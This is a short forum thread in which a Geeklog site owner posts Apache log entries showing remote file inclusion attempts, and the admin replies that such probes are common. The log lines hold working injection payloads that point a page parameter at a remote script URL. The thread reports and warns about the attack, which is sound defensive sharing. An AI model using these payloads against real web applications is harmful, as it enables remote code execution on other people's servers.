Welcome to Geeklog, Anonymous Wednesday, September 28 2022 @ 05:12 am EDT

Geeklog Forums

Just commenting about hacking attempts.


Status: offline

joelbarrios

Forum User
Junior
Registered: 05/03/04
Posts: 23
Location:Mexico
Looking at webalizer stats, I noted about a thousand referrals from a website I never heard about before. having a closer look at apache access_log, I found hundreds of entries like this:

212.34.137.241 - - [08/Mar/2008:07:24:45 -0600] "GET /staticpages/index.php/instalando-mysql-php-solaris/index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 31880 "-" "libwww-perl/5.79"
212.34.137.241 - - [08/Mar/2008:07:24:47 -0600] "GET /index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 78689 "-" "libwww-perl/5.79"
212.34.137.241 - - [08/Mar/2008:07:24:53 -0600] "GET /staticpages/index.php/index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 31788 "-" "libwww-perl/5.79"

Seems somebody tried to run a code injection script hosted at http://www.paintland.ru/newsite/modules/id.txt (looks like a PHP Nuke blog about Paintball in russian). No damage done. My Geeklog website is running perfectly well and untouched and un-defaced.

Anyway, I felt it would be useful to share this to Geeklog Community, just in case.
--
https://www.AlcanceLibre.org/
https://blog.AlcanceLibre.org/
La libertad del conocimiento al alcance de quien la busca.
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Yeah, these have become a real pest - a complete width of CPU and bandwidth. Not much you can do about them, though.

bye, Dirk
 Quote

All times are EDT. The time is now 05:12 am.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content